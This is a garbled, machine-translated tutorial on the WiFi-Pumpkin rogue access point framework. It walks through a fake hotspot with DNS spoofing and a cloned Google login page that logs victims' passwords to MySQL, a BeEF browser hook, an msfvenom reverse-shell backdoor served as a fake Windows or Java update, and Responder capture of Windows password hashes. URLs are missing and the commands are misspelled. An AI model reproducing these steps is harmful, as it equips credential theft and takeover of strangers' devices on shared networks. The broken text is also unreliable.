practical course of pumpkin wireless penetration testing framework

Posted by trammel at 2020-04-17

*The original author of this article: blacksunny, this article is an original reward program of freebuf, which is prohibited to reprint without permission


WiFi pumpkin is a complete framework dedicated to wireless environment penetration testing, which can forge access points to complete man in the middle attack, and also support some other wireless penetration testing functions. Aiming to provide a more secure wireless network service, the tool can be used to monitor the traffic data of the target user, and capture the unknown user through wireless phishing, so as to achieve the purpose of monitoring the data traffic of the target user.

major function

Rouge WiFi Access Point

Deauth Attack Clients AP

Probe Request Monitor

DHCP Starvation Attack

Credentials Monitor

Transparent Proxy

Windows Update Attack

Phishing Manager

Partial Bypass HSTS protocol

Support beef hook

ARP Poison

DNS Spoof

Patch Binaries via MITM

Karma Attack (supporthostapd-mana)

LLMNR,NBT-NS and MDNSpoisoner(Responder)


Capture images on the fly

TCP-Proxy(with scapy)

Plug-in unit

Transparent Proxy:

Transparentproxy can allow users to intercept / modify traffic information, at the same time, it can achieve JavaScript injection of the target page, and it can also easily achieve modular injection and create a python file (plugins / extension / directory), and finally display information under the pumpproxy (label).

TCP-Proxy Server

You can set up a proxy in TCP stream. It can filter the request and response flow through the scapy module and modify the packets of the TCP protocol to obtain the interception. This plug-in uses modules to view or modify the intercepted data. Only add your custom module in "plugins / analysts /", and it will be listed in the TCP proxy tag automatically.

Install WiFi pumpkin

git clone

pip install –r requirements.txt

./ –install

Run wifi-pumpkin: Python

Create fishing page


/etc/init.d/mysql start

Mysql –u root

Create database xeus;

Use xeus;

Create table logins(networkvarchar(64), email varchar(64), password varchar(64));

Download fake page

git clone

Put the fake login page file in the / var / www directory.

Edit the database.php file and set the file content:

$username = “root”;

$password = “”;

$db_name = “xeus”;

$tbl_name = “logins”;

$username = “root”;

$password = “”;

$db_name = “xeus”;

$tbl_name = “logins”;

The content set here is set according to your own environment. Here is my environment.

Restart MySQL / etc / init.d/mysql restart

Set up WiFi pumpkin

Run wifi-pumpkin, enter this directory, Python

To switch to the settings command, you can set the SSID number. Here, I directly select the default pumpap with the channel number of 11. Here, I select enable wireless security with the password of 1234567890, etc. Note: here the NetworkAdapter is the name of the wireless network card. You need to buy a wireless network card.


Cancel the proxy, click plugins next to it, and then cancel the proxy server, as shown in the figure.

Click start, and then you can see the wireless hotspot with the SSID of pumpap on the mobile phone. You can see the encryption status. Enter the set password; 1234567890, you can connect.

Then click DNS spoofer under modules to enter the page. Take dnsspoof default domain name as an example, click Start attack. Make DNS spoofrunning

Select the phishing manager module, select index.html in options, and click Start server. Then, after the mobile client connects to the pumpap wireless hotspot, enter the domain name of, and the setting information appears.

Then select setdirectory, as shown in the figure, set the fake login page path set above to setenv path, and then click Start server. You can see the relevant forged pages in the mobile client.

Enter the mailbox and password on the fake Google page above, and then enter the logins table of Mysql to see the relevant information.

Beef with attack

Run. / bef in the / usr / share / bef XSS directory. As shown in the figure. Select the hook URL.

Then log in to beef at The default account and password are beef.

Follow the above process to set the pumpap wireless hotspot, enter the physics manager module, and select set as shown in the figure.

Then click Start server to run, then connect to the pumpap wireless hotspot on the mobile client, and then open the domain name of The attacked machine will appear on the beef page. Then you can go into deep attack through beef.

Rebound shell

Generate a shellcode backdoor, use the msfvenom command: mefvenom – pwindows / meterpreter / reverse_tcp lhost = your local IP address lport = 4444 – f exe – o windowsupdate.exe to enter the msfconsole interface, and wait for the shell to connect.

According to the settings of WiFi push, enter the DNS spoofer interface, delete the in DNS: spoof, and then fill in a domain name by yourself (I still choose here). Here, please note that the previous must be deleted. If it doesn't occupy a port, the subsequent operation will not succeed.

On the DNS spoofer page, select fake update to enter this page, and then add your own shellcode back door to this path. Here, you can choose windows update or Java update. The network adapter should choose WLAN 0, its own wireless network card.

Then connect to my fake pumpap wireless hotspot on the target machine and enter the domain name of You can enter the forgery page selected above.

The Java update page is shown below.

If the attacker's computer downloads our back door, it installs the back door. Then we can get its computer permission in Kali.

Stealing Accouts Password Hashes

Run WiFi pumpkin program, and select responder in advanced mode: monitor mitm attack on the interface. As shown in the figure.

Then select responder in plugins and close enable proxy server. You can open the configuration page in change. (generally, it is better by default. You can also turn it on and off according to the options you want to grab), as shown in the figure.

Our main purpose is to grab the account and password of windows, run this operation on the target machine, and the user name and hash password of the target machine will be displayed in the WiFi Pushkin responder.


The above is mainly verified by reference to some articles. The reference articles are as follows:

*The original author of this article: blacksunny, this article is an original reward program of freebuf, which is prohibited to reprint without permission